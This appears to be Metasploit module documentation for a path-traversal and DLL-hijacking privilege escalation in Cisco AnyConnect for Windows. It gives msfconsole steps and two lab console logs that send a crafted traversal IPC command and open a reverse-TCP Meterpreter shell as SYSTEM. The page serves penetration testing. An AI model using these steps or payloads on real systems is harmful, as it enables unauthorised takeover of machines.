## Vulnerable Application

The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
to create/overwrite files in arbitrary locations as the SYSTEM user.

The attack consists of sending a specially crafted IPC request to the TCP port
62522 on the loopback device, which is exposed by the Cisco AnyConnect Secure
Mobility Agent service. This service will then launch the vulnerable installer
component (`vpndownloader`), which copies itself to an arbitrary location
before being executed as the SYSTEM user. Since `vpndownloader` is also
vulnerable to DLL hijacking, a specially crafted DLL (`dbghelp.dll`) is created
at the same location `vpndownloader` is copied to get code execution as the
SYSTEM user.

This exploit has been successfully tested against Cisco AnyConnect Secure
Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86).

AnyConnect Secure Mobility Client is not publicly available and only customers
with active contracts can download it. For this reason, download links have not
been provided.

## Install the Application

  1. Unzip the AnyConnect package
  2. Open the extracted folder
  3. Run `Setup.exe`
  4. Select `Core & VPN` only (no need to install the full package)
  5. Click `Install Selected`
  6. Confirm you want to install this specific version of Anyconnect (click `OK`)
  7. Accept the EULA (click `Accept`)
  8. `Installation complete` (click `OK`)... enjoy

  Or just run the `anyconnect-win-x.y.zzzzz-core-vpn-predeploy-k9.msi` installer and
  follow the installation steps with the default options.

## Verification Steps

  1. Start msfconsole
  2. Get a session with non-administrative privileges
  3. Do: ```use exploit/windows/local/anyconnect_path_traversal_lpe```
  4. Do: ```set SESSION <SESSION>```
  5. Do: ```set payload windows/meterpreter/reverse_tcp```
  6. Do: ```set LHOST <LHOST>```
  7. Do: ```set LPORT <LPORT>```
  8. Do: ```check```
  9. Do: ```run```
  10. You should get a new session as the SYSTEM user

## Options
### ForceExploit

  Set this to `true` to override the `check` result during exploitation.

## Scenarios

### Windows 10 version 1909 (x64) with AnyConnect 4.7.4056

  ```
  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 8
  SESSION => 8
  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 172.16.60.1
  LHOST => 172.16.60.1
  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 4445
  LPORT => 4445
  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set verbose true
  verbose => true
  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > check

  [*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
  [+] Cisco AnyConnect version 4.7.4056.0.0 appears to be vulnerable
  [*] The target appears to be vulnerable.
  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > run

  [*] Started reverse TCP handler on 172.16.60.1:4445
  [*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
  [+] Cisco AnyConnect version 4.7.4056.0.0 appears to be vulnerable
  [*] "-ipc" argument needed
  [*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
  [*] IPC Command: "CAC-nc-install	-ipc=18201	C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vphU\vphU\vphU\vphU\../../../../vpndownloader.exe	-"
  [*] Connecting to the AnyConnect agent on 127.0.0.1:62522
  [*] Send the encoded IPC command (size = 270 bytes)
  [*] Sending stage (176195 bytes) to 172.16.60.202
  [*] Meterpreter session 9 opened (172.16.60.1:4445 -> 172.16.60.202:49765) at 2020-06-19 19:35:29 +0200
  [+] Deleted C:\ProgramData\Cisco\dbghelp.dll
  [+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
  [*] Shutdown the socket

  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > sysinfo
  Computer        : DESKTOP-UUQE0B4
  OS              : Windows 10 (10.0 Build 18363).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
  ```

### Windows 7 SP1 (x86) with AnyConnect 4.5.5030

  ```
  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 8
  SESSION => 8
  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 172.16.60.1
  LHOST => 172.16.60.1
  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 4445
  LPORT => 4445
  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set verbose true
  verbose => true
  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > check

  [*] Found vpndownloader.exe path: 'C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
  [+] Cisco AnyConnect version 4.5.5030.0.0 appears to be vulnerable
  [*] The target appears to be vulnerable.
  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > run

  [*] Started reverse TCP handler on 172.16.60.1:4445
  [*] Found vpndownloader.exe path: 'C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
  [+] Cisco AnyConnect version 4.5.5030.0.0 appears to be vulnerable
  [*] "-ipc" argument not needed
  [*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
  [*] IPC Command: "CAC-nc-install	C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vphU\vphU\vphU\vphU\../../../../vpndownloader.exe	-"
  [*] Connecting to the AnyConnect agent on 127.0.0.1:62522
  [*] Send the encoded IPC command (size = 247 bytes)
  [*] Sending stage (176195 bytes) to 172.16.60.134
  [*] Meterpreter session 10 opened (172.16.60.1:4445 -> 172.16.60.134:49218) at 2020-06-19 19:41:53 +0200
  [+] Deleted C:\ProgramData\Cisco\dbghelp.dll
  [+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
  [*] Shutdown the socket

  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > sysinfo
  Computer        : WIN7-DEV
  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
  Architecture    : x86
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x86/windows
  ```
